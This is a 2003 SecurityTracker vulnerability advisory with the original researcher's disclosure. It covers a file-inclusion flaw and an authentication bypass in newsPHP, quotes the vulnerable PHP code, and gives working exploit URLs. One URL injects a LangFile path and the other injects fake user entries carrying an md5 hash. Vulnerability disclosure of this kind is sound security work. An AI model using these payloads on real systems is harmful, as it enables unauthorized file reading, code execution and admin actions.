SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  NewsPHP (nphp.net) Vendors:  newsPHP Development Team
newsPHP Flaws in 'nphpd' Permit Remote Users to View and Execute Files and Execute Script Functions
SecurityTracker Alert ID:  1007584
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 27 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 216 and prior versions
Description:  A file inclusion vulnerability was reported in newsPHP. A remote user can include arbitrary files on the system to view files and execute code. A remote user can also invoke script functions without authenticating.

It is reported that if the LangFile is not set in the config file (which is the default configuration) then a remote user can include any existing file on the web server. This is due to a flaw in the 'nphpd.php' script. This flaw can be exploited to potentially view files on the system or execute PHP code on the system.

A demonstration exploit URL is provided:

http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file

It is also reported that a remote user can perform various actions on the system without having to authenticate to the system. This can reportedly be achieved by injecting specially crafted data for a fake user. A demonstration exploit is provided:

http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5

In the above exploit, md5('a') is '0cc175b9c0f1b6a831c399e269772661'.
Impact:  A remote user can include arbitrary files on the system to view the files or execute PHP files.

A remote user can perform various functions without having to login.
Solution:  No solution was available at the time of this entry.

[Editor's note: The vendor's web site indicates that development of NewsPHP has stopped in favor of a new project, NewsPHP Advanced.]
Vendor URL:  www.nphp.net/ (Links to External Site)
Cause:  Authentication error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Dariusz 'Officerrr' Kolasinski" <officerrr@poligon.com.pl>
Message History:   None.

 Source Message Contents
Date:  Mon, 25 Aug 2003 05:04:22 +0200
From:  "Dariusz 'Officerrr' Kolasinski" <officerrr@poligon.com.pl>
Subject:  newsPHP file inclusion & bad login validation

 

newsPHP arbitary file inclusion & bad login validation

===+++===+++===+++
Product: newsPHP
Version: <= v216
Vendor: http://www.nphp.net
Author: Officerrr <officerrr@poligon.com.pl>
Discover by: Officerrr <officerrr@poligon.com.pl>
Vendor Response: Not contacted yet...
===+++===+++===+++


Problem #1:
===+++===+++===+++
Attacker can include any existing file on the web server,
if the LangFile is not set in config (it is not set by default).


PHP Code/Location #1:
===+++===+++===+++
-- from nphpd.php
[..]
// We know what we are supposed to be doing
// now. Load in a custom language if they
// have it set.
[..]
Oh yeah, we are ;]
[..]
  if(isset($nphp_config["LangFile"]))
  {
   if(strtolower($nphp_config["LangFile"]) != "default" && $nphp_config["
LangFile"] != "" && file_exists($nphp_config["LangFile"]))
   {   
     include($nphp_config["LangFile"]);
   }
  }
[...]


Exploit #1:
===+++===+++===+++
http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file


Problem #2:
===+++===+++===+++  
User can preform any other action than 'login' without knowing
the password and valid username.


Snip #2:
===+++===+++===+++
md5('a') is '0cc175b9c0f1b6a831c399e269772661'


PHP Code/Location #2:
===+++===+++===+++
-- from nfunc.php
  function LoadSettings(&$config, &$users)
[...]
          $users[$id][] = eregi_replace("[\n\r]","",$raw_config_line[$x]);
[...]

-- from nphpd.php
[...]
LoadSettings($nphp_config, $nphp_users);
[...]
    for($i = 0; $i < count($nphp_users); $i++)
          {
                  if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && ($nphp_users[$
i][1] == md5($pword)))
                  {
[...]
// hmmmm so we can inject users using nphp_users[index] in url


Exploit #2:
===+++===+++===+++
http://[host]/nphp/?[action here, example: output]&
     pword=a&
     uname=[fake usernamehere]&
     nphp_users[user index here][0]=a&
     nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
     nphp_users[user index here][3]=5

-- 
Pozdrawiam,
Dariusz 'Officerrr' Kolasinski
[Linux Administrator] [gg: 516354] [uin: 83041742]
"Silent my voice, I've got no choice..."


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC